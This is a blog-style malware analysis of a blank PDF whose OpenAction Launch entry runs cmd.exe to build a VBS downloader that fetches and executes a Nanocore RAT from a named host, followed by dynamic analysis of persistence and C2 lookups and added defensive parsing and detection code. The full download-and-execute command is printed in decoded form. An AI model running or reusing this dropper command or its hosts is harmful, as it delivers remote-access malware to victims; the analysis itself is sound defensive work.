A pretty simple PDF file was uploaded to VT today, and only 11 of our 59 vendors mark it as malicious, despite its being pretty tiny and clearly bad. The file makes no effort at showing any real cover, and could even be a test upload from the malicious actor. The file writes a vbs script which downloads the next stage, and then runs the script and then the resulting binary. The stage two is still up, so I got a copy, which I was able to identify as nanocore, and do some basic dynamic analysis of that as well.

# File Info

| Field | Value |
| --- | --- |
| Filename | YourExploit.pdf |
| md5 | 6431c1ec0bd147dbbccaa09ca94b0cd8 |
| VT Link | https://www.virustotal.com/#/file/13d48d84c7207afc43076627e944423ab6d7d2e781517bc5e8d4b6e694c51c21/detection |

The file was uploaded to VT 2018-09-12 15:38:53 as YourExploit.pdf. The file was probably renamed by the submitter, or else this sample was being uploaded by the actor to see if it would get past AV.

# VT Detections

There are only 11 engines detecting this as malicious, despite the general lack of legit content and only minimal obfuscation.

# PDF

## General Structure

This pdf has no real content in it. When you open it, it’s a blank page.

If we look at the size of it, it has some size, but if we take out these long lines of what I can only figure are comments as space filling junk, 93% of the characters are gone:

```
~/malware/YourExploit.pdf $ cat 13d48d84c7207afc43076627e944423ab6d7d2e781517bc5e8d4b6e694c51c21 | wc
96     267   27738
~/malware/YourExploit.pdf $ cat 13d48d84c7207afc43076627e944423ab6d7d2e781517bc5e8d4b6e694c51c21 | grep -vF // | wc
75     246    1988
```


Almost every object in the pdf has long lines of random capital letters, all starting with `//`. Here’s an example, object 2, the page:

```
obj 2 0
Type: /Pages
Referencing: 3 0 R

<<
/Kids [ 3 0 R ]
/Count 1
/Type /Pages
>>
```


I think that is like a comment, and can be ignored. I suspect that was added by the authors to give the pdf some size, make it believable. If you know for sure, please leave a comment below. I’ll cut these lines out of text displayed throughout the rest of this post.

## PDF Structure

The PDF is tiny, with only 5 objects, all on 1 page (which is common for malicious pdfs):

```
pdfid.py 13d48d84c7207afc43076627e944423ab6d7d2e781517bc5e8d4b6e694c51c21
PDFiD 0.2.4 13d48d84c7207afc43076627e944423ab6d7d2e781517bc5e8d4b6e694c51c21
obj                    5
endobj                 5
stream                 1
endstream              0
xref                   1
trailer                1
startxref              1
/Page                  1
/Encrypt               0
/ObjStm                0
/JS                    0
/JavaScript            0
/AA                    0
/OpenAction            1
/AcroForm              0
/JBIG2Decode           0
/RichMedia             0
/Launch                1
/EmbeddedFile          0
/XFA                   0
/URI                   0
/Colors > 2^24         0
```


## OpenAction (and Launch)

The OpenAction and Launch items from pdfid.py are both in object 1, as shown by pdf-parser.py:

```
~/malware/YourExploit.pdf $ pdf-parser.py 13d48d84c7207afc43076627e944423ab6d7d2e781517bc5e8d4b6e694c51c21 --search OpenAction
obj 1 0
Type:
Referencing: 2 0 R

<< /OpenAction << /S /Launch /Win << /F '(\\103:\\\\Windows\\\\system32\\\\cmd.exe)' /P '(/c @echo strLink = "\\150\\164\\164\\160\\072\\057\\057www.materagricultura.com/nano.exe"' >> %temp%/x.\166\142\163 && @echo:>> %temp%/x.\166\142\163 && @echo strSaveTo = "%temp%/x.exe" >> %temp%/x.\166\142\163 && @echo Set objHTTP = CreateObject( "WinHttp.WinHttpRequest.5.1" ) >> %temp%/x.\166\142\163 && @echo objHTTP.Open "GET", strLink, False >> %temp%/x.\166\142\163 && @echo objHTTP.Send >> %temp%/x.\166\142\163 && @echo Set objFSO = CreateObject("Scripting.FileSystemObject") >> %temp%/x.\166\142\163 && @echo Dim objStream >> %temp%/x.\166\142\163 && @echo Set objStream = CreateObject("ADODB.Stream") >> %temp%/x.\166\142\163 && @echo With objStream >> %temp%/x.\166\142\163 && @echo .Type = 1 'adTypeBinary >> %temp%/x.\166\142\163 && @echo .Open >> %temp%/x.\166\142\163 && @echo .Write objHTTP.ResponseBody >> %temp%/x.\166\142\163 && @echo .SaveToFile strSaveTo >> %temp%/x.\166\142\163 && @echo .Close >> %temp%/x.\166\142\163 && @echo End With >> %temp%/x.\166\142\163 && %temp%/x.vbs && %temp%/x.exe "PDF Encrypted. Please click 'Open')" >> >>
```

### Mistaken Output from pdf-parser.py

It actually turns out that pdf-parser.py doesn’t quite handle the object correctly. I suspect that’s because it mishandles one of the `>>` which is actually a part of the text of the object as an object boundary.

Here’s the actual string from the pdf:

```
1 0 obj
<<
/OpenAction
<<
/S /Launch
/Win
<<
/F (\103:\\Windows\\system32\\cmd.exe)
/P (/c @echo strLink = "\150\164\164\160\072\057\057www.materagricultura.com/nano.exe" >> %temp%/x.\166\142\163 && @echo:>> %temp%/x.\166\142\163 && @echo strSaveTo = "%temp%/x.exe" >> %temp%/x.\166\142\163 && @echo Set objHTTP = CreateObject( "WinHttp.WinHttpRequest.5.1" ) >> %temp%/x.\166\142\163 && @echo objHTTP.Open "GET", strLink, False >> %temp%/x.\166\142\163 && @echo objHTTP.Send >> %temp%/x.\166\142\163 && @echo Set objFSO = CreateObject("Scripting.FileSystemObject") >> %temp%/x.\166\142\163 && @echo Dim objStream >> %temp%/x.\166\142\163 && @echo Set objStream = CreateObject("ADODB.Stream") >> %temp%/x.\166\142\163 && @echo With objStream >> %temp%/x.\166\142\163 && @echo .Type = 1 'adTypeBinary >> %temp%/x.\166\142\163 && @echo .Open >> %temp%/x.\166\142\163 && @echo .Write objHTTP.ResponseBody >> %temp%/x.\166\142\163 && @echo .SaveToFile strSaveTo >> %temp%/x.\166\142\163 && @echo .Close >> %temp%/x.\166\142\163 && @echo End With >> %temp%/x.\166\142\163 && %temp%/x.vbs && %temp%/x.exe PDF Encrypted. Please click 'Open')
>>
>>
/Pages 2 0 R
/Type /Catalog
>>
```

### Breakdown of OpenAction

I pulled out the Adobe Portable Document Format Reference to understand what was going on here. Typically, in PDFs I’ve looked at in the past, the OpenAction had references to javascript or other code that was to run. I’m guessing this is an indication that this PDF was made by hand. The reference describes an OpenAction as follows:

> (Optional; PDF 1.1) A value specifying a destination to be displayed or an action to be performed when the document is opened. The value is either an array defining a destination (see Section 8.2.1, “Destinations”) or an action dictionary representing an action (Section 8.5, “Actions”). If this entry is absent, the document should be opened to the top of the first page at the default magnification factor.

So while I’m used to seeing an array defining a destination, in this case, we have an action. What’s an action? According to the reference:

> An action dictionary defines the characteristics and behavior of an action. Table 8.29 shows the required and optional entries that are common to all action dictionaries. The dictionary may contain additional entries specific to a particular action type; see the descriptions of individual action types in Section 8.5.3, “Action Types,” for details.

Finally, we’ll take a look at a Launch Action:

> A launch action launches an application or opens or prints a document. Table 8.37 shows the action dictionary entries specific to this type of action. The optional Win, Mac, and Unix entries allow the action dictionary to include platform-specific parameters for launching the designated application. If no such entry is present for the given platform, the F entry is used instead. Table 8.38 shows the platform-specific launch parameters for the Windows platform; those for the Mac OS and UNIX platforms are not yet defined at the time of publication.

### OpenAction in this PDF

With the theory out of the way, let’s look at our PDF:

We have an OpenAction, with an Action inside. That action has `/S /Launch`, defining the action type. Then, the action must have either a `/F` or an OS-specific key. We see `/Win` at the top of the blue box. And then, inside the Windows-specific action, we see `/F` giving the command to run (red), and `/P` giving the parameters to that command.

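The `/F` and `/P` values are PDF literal strings, so a parser has to consume each one as a single token (balanced parentheses, backslash and octal escapes) before it looks for `>>`; otherwise the `>>` redirections inside `/P` end the dictionary early, as in the pdf-parser.py output above. The following is an added example, not code from the original post or from pdf-parser.py: it assumes `/S /Launch` comes before `/Win` as in object 1 and that the strings are literal (not hex) strings, and `SAMPLE` is a constructed object with a placeholder host.

```python
import re

_ESC = {b"n": b"\n", b"r": b"\r", b"t": b"\t", b"b": b"\b", b"f": b"\f"}
_BSL = re.compile(rb"\\([0-7]{1,3}|\r\n|\r|\n|.)", re.S)  # one escape sequence
_KEY = re.compile(rb"/(F|P)\s*(?=\()")                    # /F or /P + literal string

def read_literal(buf, pos):
    """Decode the PDF literal string whose '(' is at buf[pos]; return (bytes, end)."""
    out, depth, i = bytearray(), 1, pos + 1
    while i < len(buf):
        m = _BSL.match(buf, i)
        if m:                                       # backslash escape
            e = m.group(1)
            if e[:1] in b"01234567":                # \ddd octal: \166 -> 'v'
                out.append(int(e, 8) & 0xFF)
            elif e not in (b"\r\n", b"\r", b"\n"):  # backslash-EOL emits nothing
                out += _ESC.get(e, e)               # \n, \(, \\ ...; unknown: drop '\'
            i = m.end()
            continue
        c = buf[i:i + 1]
        depth += (c == b"(") - (c == b")")          # unescaped parens must balance
        if depth == 0:
            return bytes(out), i + 1
        out += c
        i += 1
    raise ValueError("unterminated literal string")

def launch_actions(pdf):
    """Yield {'F': ..., 'P': ...} for each /S /Launch action in raw PDF bytes."""
    for m in re.finditer(rb"/S\s*/Launch\b", pdf):
        i, depth, entry = m.end(), 0, {}
        while i < len(pdf) and depth >= 0:          # depth < 0: action dictionary closed
            key = _KEY.match(pdf, i)
            if key:                                 # decode the whole string as one token
                val, i = read_literal(pdf, key.end())
                entry[key.group(1).decode()] = val.decode("latin-1")
            elif pdf[i:i + 1] == b"(":              # other strings: skip, never scan inside
                _, i = read_literal(pdf, i)
            elif pdf[i:i + 2] in (b"<<", b">>"):    # real dictionary delimiters only
                depth += 1 if pdf[i:i + 2] == b"<<" else -1
                i += 2
            else:
                i += 1
        yield entry

# Constructed sample: same shape and escapes as object 1 above, placeholder host.
SAMPLE = (rb'<< /OpenAction << /S /Launch /Win << /F (\103:\\Windows\\system32\\cmd.exe) '
          rb'/P (/c @echo strLink = "\150\164\164\160\072\057\057stage2.example/a.exe" '
          rb'>> %temp%/x.\166\142\163 && %temp%/x.vbs) >> >> >>')
```

Running `list(launch_actions(SAMPLE))` returns the decoded command and its full parameter string, with the `>>` redirections kept inside `P`.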
At the end of the day, at open, this PDF will try to run the following (spacing cleaned up by me):

```
C:\Windows\system32\cmd.exe /c '
@echo strLink = "http://www.materagricultura.com/nano.exe" >> %temp%/x.vbs &&
@echo:>> %temp%/x.vbs &&
@echo strSaveTo = "%temp%/x.exe" >> %temp%/x.vbs &&
@echo Set objHTTP = CreateObject( "WinHttp.WinHttpRequest.5.1" ) >> %temp%/x.vbs &&
@echo objHTTP.Open "GET", strLink, False >> %temp%/x.vbs &&
@echo objHTTP.Send >> %temp%/x.vbs &&
@echo Set objFSO = CreateObject("Scripting.FileSystemObject") >> %temp%/x.vbs &&
@echo Dim objStream >> %temp%/x.vbs &&
@echo Set objStream = CreateObject("ADODB.Stream") >> %temp%/x.vbs &&
@echo With objStream >> %temp%/x.vbs &&
@echo .Type = 1 'adTypeBinary >> %temp%/x.vbs &&
@echo .Open >> %temp%/x.vbs &&
@echo .Write objHTTP.ResponseBody >> %temp%/x.vbs &&
@echo .SaveToFile strSaveTo >> %temp%/x.vbs &&
@echo .Close >> %temp%/x.vbs &&
@echo End With >> %temp%/x.vbs &&
%temp%/x.vbs &&
%temp%/x.exe PDF Encrypted. Please click 'Open'
```

This will build a vbs script that will download a file from http://www.materagricultura.com/nano.exe. It then runs the script, and then executes the exe that the vbs script downloads. I can’t quite explain the string at the end. It’s almost like a lure or piece of social engineering that doesn’t seem to work or do anything. I think it’ll be taken as an arg to x.exe (which is likely not used by the binary).

# Stage 2

## Acquisition

At the time of writing, the stage two c2 of http://www.materagricultura.com/nano.exe was still up, and I was able to grab the next stage with curl.

## VT

I submitted it to VT, and was the first to do so. Where many missed the PDF, not so many missed the exe:

## Identification - Nanocore

Based on the names of the signatures, the name of the exe itself, and some googling, it looks like this is nanocore, a piece of malware available for sale on the dark web.

I found some Nanocore yara rules in the Yara-Rules GitHub, and they matched on this sample as Gen2:

```
$ yara RAT_Nanocore.yar nano.exe
Nanocore_RAT_Gen_2 nano.exe
```


## Dynamic Analysis

I did some quick dynamic analysis of what this malware tries to do. Watching with Procmon, we can see the malware:

1. Create file C:\Users\[user]\AppData\Roaming\[guid]\run.dat
2. Create file C:\Program Files (x86)\NTFS Manager\ntfsmgr.exe
• This is an exact copy of nano.exe
• On another run of the same malware, it ended up in C:\Program Files (x86)\LAN Service\lansv.exe
3. Create a persistence run key: HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\NTFS Manager with value C:\Program Files (x86)\NTFS Manager\ntfsmgr.exe
• On the other run, a similar key with a name to match the file.
4. Attempt a DNS resolution of trollo991.ddns.net
• This is a dynamic DNS provider, so it’s likely short lived
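
The folder, file and Run value names above change between runs, so a check keyed on one name would miss the next run. The following added example (not from the original post) instead correlates, per process, an .exe created one folder below Program Files with a Run value whose data is that same path. The event tuple layout, the PIDs, the `LAN Service` value name and the two benign events are constructed for illustration.

```python
import re

# Any value directly under a ...\CurrentVersion\Run key (covers the Wow6432Node view).
RUN_VALUE = re.compile(r"\\Microsoft\\Windows\\CurrentVersion\\Run\\([^\\]+)$", re.I)
# An .exe exactly one folder below Program Files / Program Files (x86).
DROPPED = re.compile(r"^[A-Z]:\\Program Files(?: \(x86\))?\\([^\\]+)\\[^\\]+\.exe$", re.I)

def find_run_key_drops(events):
    """Return Run values that point at an .exe the same process created earlier.

    events: iterable of (pid, operation, path, data) in time order (assumed layout).
    """
    created = {}                      # pid -> {lower-cased exe path: folder name}
    hits = []
    for pid, op, path, data in events:
        drop = DROPPED.match(path)
        run = RUN_VALUE.search(path)
        if op == "CreateFile" and drop:
            created.setdefault(pid, {})[path.lower()] = drop.group(1)
        elif op == "RegSetValue" and run:
            folder = created.get(pid, {}).get(data.strip('"').lower())
            if folder is not None:    # same process dropped the file it now autostarts
                hits.append({"pid": pid, "value": run.group(1), "target": data,
                             "value_matches_folder": run.group(1).lower() == folder.lower()})
    return hits

# Constructed events: the two runs described above plus two benign look-alikes.
RUN = r"\Microsoft\Windows\CurrentVersion\Run"
EVENTS = [
    (4120, "CreateFile", r"C:\Program Files (x86)\NTFS Manager\ntfsmgr.exe", ""),
    (4120, "RegSetValue", r"HKLM\SOFTWARE\Wow6432Node" + RUN + r"\NTFS Manager",
     r"C:\Program Files (x86)\NTFS Manager\ntfsmgr.exe"),
    (5332, "CreateFile", r"C:\Program Files (x86)\LAN Service\lansv.exe", ""),
    (5332, "RegSetValue", r"HKLM\SOFTWARE\Wow6432Node" + RUN + r"\LAN Service",
     r"C:\Program Files (x86)\LAN Service\lansv.exe"),
    (6001, "CreateFile", r"C:\Program Files\Vendor\tool.exe", ""),      # no Run value set
    (6100, "RegSetValue", r"HKCU\Software" + RUN + r"\Updater",
     r"C:\Program Files\Vendor\tool.exe"),                              # different process
]
```

Installers legitimately do the same thing, so a hit is a lead for checking where the writing process ran from and whether the dropped file is signed.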

## Outstanding Questions

Since I wasn’t connected to the internet, I didn’t get to see what happened when the DNS resolution succeeded. It’d also be interesting to see how many different names it will persist under.

# Summary

This was a super simple PDF that was fooling most of the endpoint products. I can theorize that this PDF was crafted by hand, and was done so either to test the process, or without regard for any kind of lure. The stage two was commercially available malware that was caught by most reputable endpoint agents.